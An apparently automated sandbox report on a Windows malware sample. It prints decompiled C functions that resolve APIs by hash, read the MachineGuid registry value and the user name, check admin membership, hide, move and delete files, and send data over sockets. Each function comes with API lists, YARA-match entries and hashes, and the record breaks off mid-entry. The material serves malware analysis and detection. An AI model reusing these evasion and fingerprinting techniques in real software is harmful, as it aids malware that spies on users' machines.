                        • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                        • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                        • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                        0x00406340
                        0x00406345
                        0x00406373
                        0x00406373
                        0x00406347
                        0x0040634f
                        0x00406354
                        0x00406357
                        0x0040635c
                        0x00406366
                        0x0040636d
                        0x00000000
                        0x00406368
                        0x00406368
                        0x00406368
                        0x00406366
                        0x0040637a

                        APIs
                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        • _wmemset.LIBCMT ref: 0040634F
                          • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser_wmemset
                        • String ID: CA
                        • API String ID: 2078537776-1052703068
                        • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                        • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                        • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                        • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                        0x00406094
                        0x004060a8
                        0x004060ab

                        APIs
                        • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: InformationToken
                        • String ID: IDA
                        • API String ID: 4114910276-365204570
                        • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                        • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                        • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                        • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                        0x00402c10
                        0x00402c15
                        0x00402c1b
                        0x00402c1e

                        APIs
                        • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: AddressProc
                        • String ID: s1@
                        • API String ID: 190572456-427247929
                        • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                        • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                        • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                        • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t9;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t9 = E00402B7C(0x208); // executed
				_t27 = _t9;
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}










                        0x00404a56
                        0x00404a60
                        0x00404a65
                        0x00404a6a
                        0x00404ad1
                        0x00404ad1
                        0x00404a6c
                        0x00404a71
                        0x00404a79
                        0x00404a85
                        0x00404a9a
                        0x00404a9e
                        0x00404acb
                        0x00000000
                        0x00404aa0
                        0x00404aac
                        0x00404abc
                        0x00404ac1
                        0x00404ac6
                        0x00404ac6
                        0x00404a9e
                        0x00404ad9

                        APIs
                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateOpenProcessQueryValue
                        • String ID:
                        • API String ID: 1425999871-0
                        • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                        • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                        • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                        • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                        0x00402b8c
                        0x00402b92
                        0x00402b96
                        0x00402b9e
                        0x00402ba3
                        0x00402baa

                        APIs
                        • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                        • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                        • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                        • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                        0x00402bb2
                        0x00402bc0
                        0x00000000
                        0x00402bc0
                        0x00402bc7

                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Heap$FreeProcess
                        • String ID:
                        • API String ID: 3859560861-0
                        • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                        • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                        • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                        • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 40%
                        			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                        0x004060c6
                        0x004060d5
                        0x004060d8
                        0x004060f4
                        0x004060f6
                        0x004060fb
                        0x0040610a
                        0x00406115
                        0x0040611c
                        0x0040611e
                        0x00406121
                        0x00000000
                        0x0040612a
                        0x0040612f

                        APIs
                        • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: CheckMembershipToken
                        • String ID:
                        • API String ID: 1351025785-0
                        • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                        • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                        • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                        • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                        0x00403c68
                        0x00403c70
                        0x00403c78
                        0x00403c82
                        0x00403c8b
                        0x00403c8f
                        0x00403c72
                        0x00403c76
                        0x00403c76

                        APIs
                        • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: CreateDirectory
                        • String ID:
                        • API String ID: 4241100979-0
                        • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                        • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                        • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                        • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                        0x0040643c
                        0x00406445
                        0x00406454

                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                        • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                        • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                        • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                        0x00404eed
                        0x00404ef2
                        0x00404efd
                        0x00404efd
                        0x00404f07
                        0x00404f0e

                        APIs
                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: send
                        • String ID:
                        • API String ID: 2809346765-0
                        • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                        • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                        • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                        • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                        0x00403bdd
                        0x00403beb
                        0x00403bee

                        APIs
                        • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: FileMove
                        • String ID:
                        • API String ID: 3562171763-0
                        • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                        • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                        • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                        • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Startup
                        • String ID:
                        • API String ID: 724789610-0
                        • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                        • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                        • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                        • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                        0x0040428a
                        0x00404297
                        0x0040429a

                        APIs
                        • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                        • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                        • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                        • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                        0x00404a27
                        0x00404a35
                        0x00404a38

                        APIs
                        • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                        • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                        • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                        • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                        0x00403c4d
                        0x00403c55
                        0x00403c58

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                        • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                        • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                        • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                        0x00403c15
                        0x00403c1d
                        0x00403c20

                        APIs
                        • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                        • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                        • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                        • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                        0x00402c2c
                        0x00402c34
                        0x00402c37

                        APIs
                        • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                        • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                        • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                        • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                        0x00403bfc
                        0x00403c04
                        0x00403c07

                        APIs
                        • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                        • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                        • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                        • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                        0x00403bc4
                        0x00403bcc
                        0x00403bcf

                        APIs
